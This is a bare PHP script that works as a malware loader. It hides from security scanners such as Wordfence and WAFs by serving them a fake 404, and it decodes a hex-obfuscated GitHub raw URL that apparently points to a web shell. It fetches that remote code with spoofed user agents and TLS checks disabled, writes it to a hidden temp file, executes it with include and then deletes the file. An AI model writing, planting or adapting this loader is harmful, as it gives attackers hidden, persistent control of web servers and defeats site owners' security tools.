<?php
@error_reporting(0);
@ini_set('display_errors', 0);

$block = ['wordfence', 'waf', 'scanner', 'curl', 'bot', 'spider', 'crawl'];
$ua = strtolower($_SERVER['HTTP_USER_AGENT'] ?? '');
foreach ($block as $b) {
    if (strpos($ua, $b) !== false) {
        header($_SERVER["SERVER_PROTOCOL"]." 404 Not Found");
        exit;
    }
}

$hx = '68747470733A2F2F7261772E67697468756275736572636F6E74656E742E636F6D2F6F7878785459504F7878786F2F53435048502F726566732F68656164732F6D61696E2F787878414C46417878782E747874';
$u = base64_decode(base64_encode(pack("H*", $hx)));

function fetch($u) {
    $uas = [
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        "Mozilla/5.0 (Linux; Android 10; SM-G975F)",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)",
        "Googlebot/2.1 (+http://www.google.com/bot.html)"
    ];
    $ua = $uas[array_rand($uas)];

    if (function_exists('curl_init')) {
        $c = curl_init();
        curl_setopt($c, CURLOPT_URL, $u);
        curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($c, CURLOPT_USERAGENT, $ua);
        curl_setopt($c, CURLOPT_TIMEOUT, 6);
        curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
        $r = curl_exec($c);
        curl_close($c);
        if ($r) return $r;
    }

    if (ini_get('allow_url_fopen')) {
        $ctx = stream_context_create([
            'http' => [
                'method' => 'GET',
                'header' => "User-Agent: $ua\r\n",
                'timeout' => 6
            ]
        ]);
        return @file_get_contents($u, false, $ctx);
    }

    return false;
}

class Core {
    private $c;
    function __construct($x) { $this->c = $x; }
    function x() { return $this->c; }
}

$d = fetch($u);
if (!$d) exit;

$f = tempnam(sys_get_temp_dir(), '.x_');
file_put_contents($f, (new Core($d))->x());
include $f;
unlink($f);
?>
